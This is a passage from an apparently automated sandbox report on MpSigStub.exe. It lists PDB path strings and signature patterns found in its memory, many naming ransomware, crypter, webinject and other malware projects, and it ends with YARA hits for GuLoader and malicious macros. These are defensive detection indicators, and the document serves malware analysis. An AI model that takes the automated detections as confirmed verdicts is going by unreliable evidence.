Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: .+:\\.+\\.Pedro\\.PH_Secret_Application.\\PH_Secret_Application.\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: pid.pdb3 source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \ransom.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp
Source:	Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000023.00000003.6312714800.0000028BD7136000.00000004.00000001.sdmp
Source:	Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb] source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: mqutil.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: \Release\kugou.pdb source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: mstscax.pdb source: MpSigStub.exe, 00000023.00000003.6329820715.0000028BD62A2000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp
Source:	Binary string: .+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp
Source:	Binary string: PicoTorrent.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \Minoral.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: msiexec.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: upE:\\WORK\\WORK_PECEPB\\Work_2012 Private\\.*\\Silence_lock_bot\\Silence_lock_bot\\Release\\Silence_lock_bot.pdb source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
Source:	Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: MpClient.pdb source: MpSigStub.exe, 00000023.00000003.6213576387.0000028BC3EA2000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
Source:	Binary string: wship6.pdb3 source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
Source:	Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2628573263.0000000002270000.00000040.00000001.sdmp, type: MEMORY

Yara detected MaliciousMacro

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.raw.unpack, type: UNPACKEDPE
